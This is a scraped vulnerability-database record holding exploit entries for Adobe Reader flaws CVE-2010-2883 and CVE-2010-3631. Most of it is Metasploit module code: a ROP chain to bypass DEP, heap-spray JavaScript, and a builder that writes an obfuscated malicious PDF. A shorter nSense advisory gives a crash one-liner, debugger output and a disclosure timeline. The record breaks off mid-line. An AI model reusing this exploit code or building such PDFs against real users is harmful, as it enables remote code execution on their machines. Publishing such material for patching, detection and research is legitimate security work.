memcpy\r\n\t\t\t0x4a80b692, # jmp [eax]\r\n\r\n\t\t\t0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy\r\n\t\t\t0xffffffff, # becomes first arg to memcpy (dst)\r\n\t\t\t0xffffffff, # becomes second arg to memcpy (src)\r\n\t\t\t0x00001000, # becomes third arg to memcpy (length)\r\n\t\t\t#0x0000258b, # ??\r\n\t\t\t#0x4d4d4a8a, # ??\r\n\t\t].pack('V*')\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = ''\r\n\t\tpayload_buf << stack_data\r\n\t\tpayload_buf << encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\r\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\r\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += #{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj \\n\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\t#return str\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(ttf, js)\r\n\r\n\t\t#swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\r\n\r\n\t\txref = []\r\n\t\teol = \"\\n\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<<\") << eol\r\n\t\tpdf << nObfu(\"/Pages \") << ioRef(2) << eol\r\n\t\tpdf << nObfu(\"/Type /Catalog\") << eol\r\n\t\tpdf << nObfu(\"/OpenAction \") << ioRef(11) << eol\r\n\t\t# The AcroForm is required to get icucnv36.dll to load\r\n\t\tpdf << nObfu(\"/AcroForm \") << ioRef(13) << eol\r\n\t\tpdf << nObfu(\">>\") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# pages array\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<<\") << eol\r\n\t\tpdf << nObfu(\"/MediaBox \") << ioRef(3) << eol\r\n\t\tpdf << nObfu(\"/Resources \") << ioRef(4) << eol\r\n\t\tpdf << nObfu(\"/Kids [\") << ioRef(5) << \"]\" << eol\r\n\t\tpdf << nObfu(\"/Count 1\") << eol\r\n\t\tpdf << nObfu(\"/Type /Pages\") << eol\r\n\t\tpdf << nObfu(\">>\") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# media box\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3)\r\n\t\tpdf << \"[0 0 595 842]\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# resources\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4)\r\n\t\tpdf << nObfu(\"<<\") << eol\r\n\t\tpdf << nObfu(\"/Font \") << ioRef(6) << eol\r\n\t\tpdf << \">>\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# page 1\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<<\") << eol\r\n\t\tpdf << nObfu(\"/Parent \") << ioRef(2) << eol\r\n\t\tpdf << nObfu(\"/MediaBox \") << ioRef(3) << eol\r\n\t\tpdf << nObfu(\"/Resources \") << ioRef(4) << eol\r\n\t\tpdf << nObfu(\"/Contents [\") << ioRef(8) << nObfu(\"]\") << eol\r\n\t\tpdf << nObfu(\"/Type /Page\") << eol\r\n\t\tpdf << nObfu(\">>\") << eol # end obj dict\r\n\t\tpdf << endobj\r\n\r\n\t\t# font\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(6) << nObfu(\"<<\") << eol\r\n\t\tpdf << nObfu(\"/F1 \") << ioRef(7) << eol\r\n\t\tpdf << \">>\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# ttf object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu(\"<<\") << eol\r\n\t\tpdf << nObfu(\"/Type /Font\") << eol\r\n\t\tpdf << nObfu(\"/Subtype /TrueType\") << eol\r\n\t\tpdf << nObfu(\"/Name /F1\") << eol\r\n\t\tpdf << nObfu(\"/BaseFont /Cinema\") << eol\r\n\t\tpdf << nObfu(\"/Widths []\") << eol\r\n\t\tpdf << nObfu(\"/FontDescriptor \") << ioRef(9)\r\n\t\tpdf << nObfu(\"/Encoding /MacRomanEncoding\")\r\n\t\tpdf << nObfu(\">>\") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# page content\r\n\t\tcontent = \"Hello World!\"\r\n\t\tcontent = \"\" +\r\n\t\t\t\"0 g\" + eol +\r\n\t\t\t\"BT\" + eol +\r\n\t\t\t\"/F1 32 Tf\" + eol +\r\n\t\t\t\"32 Tc\" + eol +\r\n\t\t\t\"1 0 0 1 32 773.872 Tm\" + eol +\r\n\t\t\t\"(\" + content + \") Tj\" + eol +\r\n\t\t\t\"ET\"\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8) << \"<<\" << eol\r\n\t\tpdf << nObfu(\"/Length %s\" % content.length) << eol\r\n\t\tpdf << \">>\" << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << content << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# font descriptor\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9) << nObfu(\"<<\")\r\n\t\tpdf << nObfu(\"/Type/FontDescriptor/FontName/Cinema\")\r\n\t\tpdf << nObfu(\"/Flags %d\" % (2**2 + 2**6 + 2**17))\r\n\t\tpdf << nObfu(\"/FontBBox [-177 -269 1123 866]\")\r\n\t\tpdf << nObfu(\"/FontFile2 \") << ioRef(10)\r\n\t\tpdf << nObfu(\">>\") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# ttf stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ttf)\r\n\t\tpdf << ioDef(10) << nObfu(\"<</Length %s/Filter/FlateDecode/Length1 %s>>\" % [compressed.length, ttf.length]) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# js action\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11) << nObfu(\"<<\")\r\n\t\tpdf << nObfu(\"/Type/Action/S/JavaScript/JS \") + ioRef(12)\r\n\t\tpdf << nObfu(\">>\") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# js stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(12) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t###\r\n\t\t# The following form related data is required to get icucnv36.dll to load\r\n\t\t###\r\n\r\n\t\t# form object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(13)\r\n\t\tpdf << nObfu(\"<</XFA \") << ioRef(14) << nObfu(\">>\") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# form stream\r\n\t\txfa = <<-EOF\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\r\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\r\n<present><pdf><interactive>1</interactive></pdf></present>\r\n</config>\r\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\r\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\r\n<pageSet></pageSet>\r\n</subform></template></xdp:xdp>\r\nEOF\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(14) << nObfu(\"<</Length %s>>\" % xfa.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << xfa << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t###\r\n\t\t# end form stuff for icucnv36.dll\r\n\t\t###\r\n\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\r\n\t\tpdf << \"trailer\" << eol\r\n\t\tpdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\r\n\t\tpdf << \"%%EOF\" << eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16494/"}, {"lastseen": "2016-02-01T21:20:00", "description": "Adobe Acrobat and Reader Array Indexing Remote Code Execution Vulnerability. CVE-2010-3631. Dos exploit for osx platform", "published": "2010-10-06T00:00:00", "type": "exploitdb", "title": "Adobe Acrobat and Reader Array Indexing Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3631"], "modified": "2010-10-06T00:00:00", "id": "EDB-ID:15212", "href": "https://www.exploit-db.com/exploits/15212/", "sourceData": " nSense Vulnerability Research Security Advisory NSENSE-2010-001\r\n ---------------------------------------------------------------\r\n\r\n Affected Vendor: Adobe\r\n Affected Product: Adobe Reader 9.3.4 for Macintosh\r\n Platform: OS X\r\n Impact: User assisted code execution\r\n Vendor response: Patch\r\n Credit: Knud / nSense\r\n \r\n Description: Adobe Acrobat and Reader are prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application. Adobe Reader and Acrobat versions prior to and including 9.3.4 and 8.2.4 are affected.\r\n\r\n NOTE: This issue only affects Adobe Reader and Acrobat running on Apple Mac OS X \r\n\r\n Technical details\r\n ---------------------------------------------------------------\r\n\r\n terminal 1:\r\n $ gdb --waitfor=AdobeReader\r\n\r\n terminal 2:\r\n $ open acrobat://`perl -e 'print \"A\" x 12000'`\r\n\r\n terminal 1:\r\n (gdb) cont\r\n [snip]\r\n Program received signal EXC_BAD_ACCESS, Could not access memory.\r\n Reason: KERN_INVALID_ADDRESS at address: 0xc00013d2\r\n 0x7ffa0d6a in AcroBundleThreadQuitProc ()\r\n (gdb) set disassembly-flavor intel\r\n (gdb) x/i $pc\r\n 0x7ffa0d6a <AcroBundleThreadQuitProc+2608>: mov BYTE PTR\r\n [ebp+eax-0x420],0x0\r\n (gdb) i r ebp eax\r\n ebp 0xbfffe908 0xbfffe908\r\n eax 0x2eea 12010\r\n (gdb)\r\n\r\n As can be seen from the above, we control the value in eax (in\r\n this case 12010, the length of the acrobat:// + the 12000 A's).\r\n\r\n This allows us to write the null byte anywhere in memory between\r\n ebp-0x420 (0xBFFFE4E8) and the end of the stack.\r\n\r\n The behaviour may be leveraged to modify the frame pointer,\r\n changing the execution flow and thus permitting arbitrary code\r\n execution in the context of the user running the program.\r\n\r\n Timeline:\r\n Aug 10th Contacted vendor PSIRT\r\n Aug 10th Vendor response. Vulnerability reproduced.\r\n Aug 16th Status update request sent to vendor\r\n Aug 17th Vendor response, still investigating\r\n Sep 2nd Status update request sent to vendor\r\n Sep 3rd Vendor response. Working on fix\r\n Sep 22nd Contacted vendor regarding patch date\r\n Sep 22nd Vendor response. Confirmed patch date.\r\n Sep 23rd Corrected researcher name\r\n Oct 1st Vendor sent CVE identifier CVE-2010-3631\r\n Oct 5th Vendor releases the patch\r\n Oct 6th Advisory published\r\n\r\n http://www.nsense.fi http://www.nsense.dk\r\n\r\n\r\n\r\n $$s$$$$s. ,s$$$$s ,S$$$$$s. $$s$$$$s. ,s$$$$s ,S$$$$$s.\r\n $$$ `$$$ ($$( $$$ `$$$ $$$ `$$$ ($$( $$$ `$$$\r\n $$$ $$$ `^$$s. $$$$$$$$$ $$$ $$$ `^$$s. $$$$$$$$$\r\n $$$ $$$ )$$) $$$ $$$ $$$ )$$) $$$\r\n $$$ $$$ ^$$$$$$7 `7$$$$$P $$$ $$$ ^$$$$$$7 `7$$$$$P\r\n\r\n D r i v e n b y t h e c h a l l e n g e _\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/15212/"}], "packetstorm": [{"lastseen": "2016-12-05T22:13:46", "description": "", "published": "2010-09-09T00:00:00", "type": "packetstorm", "title": "Adobe Reader Smart INdependent Glyplets (SING) Table Handling Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2883"], "modified": "2010-09-09T00:00:00", "id": "PACKETSTORM:93627", "href": "https://packetstormsecurity.com/files/93627/Adobe-Reader-Smart-INdependent-Glyplets-SING-Table-Handling-Vulnerability.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \nrequire 'zlib' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a vulnerability in the Smart INdependent Glyplets (SING) table \nhandling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version are \nassumed to be vulnerable as well. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # 0day found in the wild \n'@sn0wfl0w', # initial analysis \n'@neox_fx', # initial analysis \n'@vicheck', # initial analysis \n'jduck' # Metasploit module \n], \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2010-2883' ], \n[ 'OSVDB', '67849'], \n[ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ], \n[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n'InitialAutoRunScript' => 'migrate -f' \n}, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd \n[ 'Automatic', { }], \n], \n'DisclosureDate' => 'Sep 07 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), \n], self.class) \nend \n \ndef exploit \nttf_data = make_ttf() \n \njs_data = make_js(payload.encoded) \n \n# Create the pdf \npdf = make_pdf(ttf_data, js_data) \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \n \nfile_create(pdf) \nend \n \ndef make_ttf \nttf_data = \"\" \n \n# load the static ttf file \n \n# NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20) \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"cve-2010-2883.ttf\" ) \nfd = File.open( path, \"rb\" ) \nttf_data = fd.read(fd.stat.size) \nfd.close \n \n# Build the SING table \nsing = '' \nsing << [ \n0, 1, # tableVersionMajor, tableVersionMinor (0.1) \n0xe01, # glyphletVersion \n0x100, # embeddingInfo \n0, # mainGID \n0, # unitsPerEm \n0, # vertAdvance \n0x3a00 # vertOrigin \n].pack('vvvvvvvv') \n# uniqueName \n# \"The uniqueName string must be a string of at most 27 7-bit ASCII characters\" \nsing << \"A\" * (0x254 - sing.length) \n \n# 0xffffffff gets written here @ 0x7001400 (in BIB.dll) \nsing[0x140, 4] = [0x08231060 - 0x1c].pack('V') \n \n# This becomes our new EIP (puts esp to stack buffer) \nret = 0x81586a5 # add ebp, 0x794 / leave / ret \nsing[0x208, 4] = [ret].pack('V') \n \n# This becomes the new eip after the first return \nret = 0x806c57e \nsing[0x18, 4] = [ret].pack('V') \n \n# This becomes the new esp after the first return \nesp = 0x0c0c0c0c \nsing[0x1c, 4] = [esp].pack('V') \n \n# Without the following, sub_801ba57 returns 0. \nsing[0x24c, 4] = [0x6c].pack('V') \n \nttf_data[0xec, 4] = \"SING\" \nttf_data[0x11c, sing.length] = sing \n \n#File.open(\"/tmp/woop.ttf\", \"wb\") { |fd| fd.write(ttf_data) } \n \nttf_data \nend \n \ndef make_js(encoded_payload) \n \n# The following executes a ret2lib using BIB.dll \n# The effect is to bypass DEP and execute the shellcode in an indirect way \nstack_data = [ \n0xc0c0c0c, \n0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret \n0xcccccccc, \n0x70048ef, # xchg eax,esp / ret \n0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8] \n0xcccccccc, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009033, # ret 0x18 \n0x7009084, # ret \n0xc0c0c0c, \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7009084, # ret \n0x7001599, # pop ebp / ret \n0x10124, \n0x70072f7, # pop eax / ret \n0x10104, \n0x70015bb, # pop ecx / ret \n0x1000, \n0x700154d, # mov [eax], ecx / ret \n0x70015bb, # pop ecx / ret \n0x7ffe0300, # -- location of KiFastSystemCall \n0x7007fb2, # mov eax, [ecx] / ret \n0x70015bb, # pop ecx / ret \n0x10011, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70015bb, # pop ecx / ret \n0x10100, \n0x700a8ac, # mov [ecx], eax / xor eax,eax / ret \n0x70072f7, # pop eax / ret \n0x10011, \n0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?) \n0x7005c54, # pop esi / add esp,0x14 / ret \n0xffffffff, \n0x10100, \n0x0, \n0x10104, \n0x1000, \n0x40, \n# The next bit effectively copies data from the interleaved stack to the memory \n# pointed to by eax \n# The data copied is: \n# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83 \n# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff \n# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90 \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x70015bb, # pop ecx / ret \n0x9054905a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5815eb5a, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x18891a8b, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x8304c083, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xfb8104c2, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xc0c0c0c, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x5ebee75, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0xffffe6e8, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x909090ff, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90909090, \n0x700154d, # mov [eax], ecx / ret \n0x700a722, # add eax, 4 / ret \n0x70015bb, # pop ecx / ret \n0x90ffffff, \n0x700154d, # mov [eax], ecx / ret \n0x700d731, # mov eax, [ebp-0x24] / ret \n0x700112f # call eax -- (execute stub to transition to full shellcode) \n].pack('V*') \n \nvar_unescape = rand_text_alpha(rand(100) + 1) \nvar_shellcode = rand_text_alpha(rand(100) + 1) \n \nvar_start = rand_text_alpha(rand(100) + 1) \n \nvar_s = 0x10000 \nvar_c = rand_text_alpha(rand(100) + 1) \nvar_b = rand_text_alpha(rand(100) + 1) \nvar_d = rand_text_alpha(rand(100) + 1) \nvar_3 = rand_text_alpha(rand(100) + 1) \nvar_i = rand_text_alpha(rand(100) + 1) \nvar_4 = rand_text_alpha(rand(100) + 1) \n \npayload_buf = '' \npayload_buf << stack_data \npayload_buf << encoded_payload \n \nescaped_payload = Rex::Text.to_unescape(payload_buf) \n \njs = %Q| \nvar #{var_unescape} = unescape; \nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); \nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" ); \nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; \n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); \n#{var_b} += #{var_shellcode}; \n#{var_b} += #{var_c}; \n#{var_d} = #{var_b}.substring(0, #{var_s}/2); \nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d}; \n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); \nvar #{var_4} = new Array(); \nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\"; \n| \n \njs \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj \\n\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \n#return str \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \n \ndef make_pdf(ttf, js) \n \n#swf_name = rand_text_alpha(8 + rand(8)) + \".swf\" \n \nxref = [] \neol = \"\\n\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? \npdf = \"%PDF-1.5\" << eol \npdf << \"%\" << RandomNonASCIIString(4) << eol \n \n# catalog \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Pages \") << ioRef(2) << eol \npdf << nObfu(\"/Type /Catalog\") << eol \npdf << nObfu(\"/OpenAction \") << ioRef(11) << eol \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# pages array \nxref << pdf.length \npdf << ioDef(2) << nObfu(\"<<\") << eol \npdf << nObfu(\"/MediaBox \") << ioRef(3) << eol \npdf << nObfu(\"/Resources \") << ioRef(4) << eol \npdf << nObfu(\"/Kids [\") << ioRef(5) << \"]\" << eol \npdf << nObfu(\"/Count 1\") << eol \npdf << nObfu(\"/Type /Pages\") << eol \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# media box \nxref << pdf.length \npdf << ioDef(3) \npdf << \"[0 0 595 842]\" << eol \npdf << endobj \n \n# resources \nxref << pdf.length \npdf << ioDef(4) \npdf << nObfu(\"<<\") << eol \npdf << nObfu(\"/Font \") << ioRef(6) << eol \npdf << \">>\" << eol \npdf << endobj \n \n# page 1 \nxref << pdf.length \npdf << ioDef(5) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Parent \") << ioRef(2) << eol \npdf << nObfu(\"/MediaBox \") << ioRef(3) << eol \npdf << nObfu(\"/Resources \") << ioRef(4) << eol \n#pdf << nObfu(\"/MediaBox [0 0 640 480]\") \n#pdf << \"<<\" \n#if true \n# pdf << nObfu(\"/ProcSet [ /PDF /Text ]\") << eol \n# pdf << nObfu(\"/Font << /F1 \") << ioRef(8) << nObfu(\">>\") << eol \n#end \n#pdf << nObfu(\">>\") << eol # end resources \npdf << nObfu(\"/Contents [\") << ioRef(8) << nObfu(\"]\") << eol \n#pdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"]\") << eol \npdf << nObfu(\"/Type /Page\") << eol \npdf << nObfu(\">>\") << eol # end obj dict \npdf << endobj \n \n# font \nxref << pdf.length \npdf << ioDef(6) << nObfu(\"<<\") << eol \npdf << nObfu(\"/F1 \") << ioRef(7) << eol \npdf << \">>\" << eol \npdf << endobj \n \n# ttf object \nxref << pdf.length \npdf << ioDef(7) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Type /Font\") << eol \npdf << nObfu(\"/Subtype /TrueType\") << eol \npdf << nObfu(\"/Name /F1\") << eol \npdf << nObfu(\"/BaseFont /Cinema\") << eol \n#pdf << nObfu(\"/FirstChar 0\") \n#pdf << nObfu(\"/LastChar 255\") \npdf << nObfu(\"/Widths []\") << eol \n#256.times { \n# pdf << \"%d \" % rand(256) \n#} \n#pdf << \"]\" << eol \npdf << nObfu(\"/FontDescriptor \") << ioRef(9) \npdf << nObfu(\"/Encoding /MacRomanEncoding\") \n#pdf << nObfu(\"/FontBBox [-177 -269 1123 866]\") \n#pdf << nObfu(\"/FontFile2 \") << ioRef(9) \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# page content \ncontent = \"Hello World!\" \ncontent = \"\" + \n\"0 g\" + eol + \n\"BT\" + eol + \n\"/F1 32 Tf\" + eol + \n#\" 10 10 Td\" + eol + \n\"32 Tc\" + eol + \n\"1 0 0 1 32 773.872 Tm\" + eol + \n#\"2 Tr\" + eol + \n\"(\" + content + \") Tj\" + eol + \n\"ET\" \n \nxref << pdf.length \npdf << ioDef(8) << \"<<\" << eol \npdf << nObfu(\"/Length %s\" % content.length) << eol \npdf << \">>\" << eol \npdf << \"stream\" << eol \npdf << content << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n# font descriptor \nxref << pdf.length \npdf << ioDef(9) << nObfu(\"<<\") \npdf << nObfu(\"/Type/FontDescriptor/FontName/Cinema\") \npdf << nObfu(\"/Flags %d\" % (2**2 